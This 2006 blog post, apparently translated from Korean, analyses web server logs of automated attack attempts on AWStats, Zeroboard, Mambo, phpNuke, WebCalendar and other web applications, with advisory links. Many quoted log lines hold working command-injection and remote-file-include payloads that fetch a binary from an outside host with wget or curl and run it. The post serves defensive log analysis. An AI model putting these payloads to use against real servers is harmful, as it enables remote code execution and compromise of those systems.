Web log analysis of web attacks (added 3.22)
Posted : 2006/03/15 23:43
Author : 좋은진호 (http://coffeenix.net/)
Title : Web log analysis of web attacks
Author : 좋은진호 (truefeel, http://coffeenix.net/)
Written : 2006.1.20 (Fri)~
Compiled : 2006.3.14 (Tue)
Revised : 2006.3.22 (Wed)

You will remember how website defacements surged from late 2004 to early 2005 because of vulnerabilities in Zeroboard, Technote, phpBB and others, together with PHP configuration problems. Most such attacks are carried out by worms or automated tools, and the logs analyzed here were likewise left by automated attack tools.

The web logs analyzed(?) here come from attacks exploiting vulnerabilities in the web log analysis tool AWStats, and in WordPress, TikiWiki, Drupal, PHPGroupWare, Webhints, Zeroboard, the CMS tool Mambo, the traffic analysis tool Cacti, and others. These logs were not gathered from elsewhere; they were separated out of the logs left on the server and posted here. Some IPs are shown as xxx.xxx.

For anyone running a server for the first time who might read this and panic, 'Whoa!! Our server was attacked too, this is serious', let me say this up front: if you do not run the public programs listed above there is nothing to worry about, and even if you do, you are fine as long as you run the latest version with the security patches applied (although undisclosed vulnerabilities do exist). Also, if the log shows HTTP/1.? 404, it was only an attack attempt and not a successful hack, so you can rest easy.

※ This article in particular displays its tables best in MSIE.

1. Attack exploiting a vulnerability in the web log analysis tool AWStats
203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:05 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:06 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : Hong Kong (HK, 203.194.128.0 - 203.194.255.255)
References :
* AWStats "configdir" Parameter Arbitrary Command Execution
http://secunia.com/advisories/13893
* AWStats Remote Command Execution Vulnerability
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185
2. Attack exploiting the Remote Code Injection vulnerability in XML-RPC for PHP
203.194.xxx.xx - - [17/Jan/2006:02:09:09 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:10 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:11 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:12 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:13 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:14 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:15 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:17 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:18 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 0
- IP : Hong Kong (HK, 203.194.128.0 - 203.194.255.255)
- This is a vulnerability in XML-RPC for PHP before 1.1; programs such as WordPress, TikiWiki, Drupal and PHPGroupWare have the related vulnerability as well.
- The Linux/Lupper worm exploits the XML-RPC vulnerability, the AWStats vulnerability and the Darryl Burgdorf Webhints vulnerability. It is also called the Lupii worm.
- This worm (variants included) automatically sends malicious requests to the web port as shown above, and if the server has a vulnerable script installed, it downloads a file from a remote host and runs it.
References :
* XML-RPC for PHP Nested XML Tags PHP Code Execution
http://secunia.com/advisories/16431/
* PEAR XML_RPC Nested XML Tags PHP Code Execution
http://secunia.com/advisories/16429/
* Linux/Lupper.worm
http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
http://vil.nai.com/vil/content/v_136821.htm
3. Attack exploiting the XML-RPC vulnerability, part 2
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
- IP : Korea (CATV user, 218.232.96.128-218.232.96.255)
4. Attack exploiting the Darryl Burgdorf Webhints vulnerability
219.239.xxx.xx - - [20/Dec/2005:04:17:10 +0900] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:11 +0900] "GET /scgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:12 +0900] "GET /includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:14 +0900] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:15 +0900] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:16 +0900] "GET /cgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:17 +0900] "GET /scgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:18 +0900] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:19 +0900] "GET /scgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:20 +0900] "GET /cgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:21 +0900] "GET /scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:22 +0900] "GET /hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:23 +0900] "GET /cgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:25 +0900] "GET /scgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:26 +0900] "GET /cgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:27 +0900] "GET /scgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:28 +0900] "GET /hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:29 +0900] "GET /cgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:30 +0900] "GET /scgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:31 +0900] "GET /webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:32 +0900] "GET /cgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:33 +0900] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:35 +0900] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:36 +0900] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:37 +0900] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:38 +0900] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:39 +0900] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:40 +0900] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:41 +0900] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:42 +0900] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:43 +0900] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:45 +0900] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:46 +0900] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
5. Attack exploiting a vulnerability in the CMS tool Mambo
213.203.xxx.xx - - [10/Jan/2006:17:59:50 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:54 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:57 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:58 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:18:00:00 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:18:00:02 +0900] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
- IP : Italy (IT, 213.203.161.0 - 213.203.161.255)
6. Attack exploiting the vulnerability in Zeroboard's zero_vote theme
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /board/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:34 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:48 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:49 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
- IP : Korea (Seoul Goeun Elementary School, 211.42.90.0-211.42.90.127)
References :
* Zeroboard security vulnerability (in Korean)
http://bbs.kldp.org/viewtopic.php?p=218132
* STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
http://www.securityfocus.com/archive/1/387076
* Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitrary Commands
http://securitytracker.com/alerts/2005/Jan/1012812.html
* Application Attack Analysis (PHP Application Mass Attack) (in Korean, 2005.1.8)
http://www.scieng.net/zero/data/pds/1105342062/Application_Attack_Analysis
(PHP).pdf
7. Attack exploiting a phpNuke vulnerability
216.72.xxx.xxx - - [07/Jan/2006:09:44:59 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:44 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:46 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:47 +0900] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:49 +0900] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : United States (US, 216.72.0.0 - 216.72.255.255)
       Colombia (CO, 200.75.46.32/27)
8. Attack exploiting a vulnerability in the Coppermine photo gallery module of phpNuke/postNuke
200.75.xx.xx - - [06/Jan/2006:10:16:50 +0900] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:52 +0900] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : Colombia (CO, 200.75.46.32/27)
- The THEME_DIR parameter is not checked, so script code from internal or external files can be included.
References :
* phpNuke/postNuke Coppermine Photo Gallery Module Multiple Vulnerabilities
http://secunia.com/advisories/11524/
9. Attack exploiting an Open WebMail vulnerability (judged to be a request to find out whether a vulnerable version is installed)
203.190.xxx.xxx - - [01/Feb/2006:01:51:25 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.190.xxx.xxx - - [01/Feb/2006:01:52:32 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
- IP : Bangladesh (BD, 203.190.254.0 - 203.190.255.255)
10. Attack exploiting an ikonBoard vulnerability
211.217.xx.xx - - [22/Feb/2006:08:06:25 +0900] "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http://www.members.lycos.co.uk/botperl/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20www.members.lycos.co.uk/botperl/botperl;perl%20botperl HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : Korea (Next Information, 211.217.75.26-211.217.75.26)
11. Attack exploiting the send_reminders.php vulnerability in WebCalendar
65.203.xxx.xxx - - [05/Dec/2005:02:34:23 +0900] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:27 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /calendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /webcalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:31 +0900] "GET /WebCalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:32 +0900] "GET /calendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /WebCalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /cal/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:29 +0900] "GET /calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : UUNET (65.203.134.96 - 65.203.134.111)
       United States (US, 216.180.224.0 - 216.180.255.255)
- WebCalendar versions lower than 1.0.1 have a vulnerability in send_reminders.php that allows a file on a remote host to be included.
References :
* WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
http://www.securityfocus.com/bid/14651
12. Attack exploiting the graph_image.php vulnerability in Cacti, the RRDtool-based traffic analysis tool
66.14.xxx.xx - - [01/Dec/2005:01:03:22 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
216.127.xx.xxx - - [23/Dec/2005:19:57:31 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
208.171.xxx.xxx - - [24/Dec/2005:02:13:41 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
- IP : United States (US, 216.127.64.0 - 216.127.95.255)
       United States (US, 208.169.96.0 - 208.173.191.255)
References :
* RaXnet Cacti Graph_Image.PHP Remote Command Execution Vulnerability
http://www.securityfocus.com/bid/14042/
13. Log left by the ATD OpenSSL vulnerability scanning tool
11.53.xxx.x - - [01/Dec/2005:00:49:31 +0900] "GET /sumthin HTTP/1.0" 404 0
- IP : United States (US, 11.0.0.0 - 11.255.255.255)
References :
* Analysis of the ATD OpenSSL Mass Exploiter
http://www.lurhq.com/atd.html
* ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)
http://seclists.org/lists/incidents/2003/Apr/0059.html
* /sumthin Solved
http://www.webmasterworld.com/forum11/2100.htm
http://www.webmasterworld.com/forum39/782.htm
14. Attack exploiting a very old (2001) HTTP vulnerability in Cisco switches
211.115.xxx.xx - - [27/Feb/2006:13:39:22 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:07:16 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:22:24 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:42:59 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:15:32:15 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
- IP : Korea (CATV user, 211.115.224.0-211.115.255.255)
- There is an automated scanning tool called cisco scanner.
References :
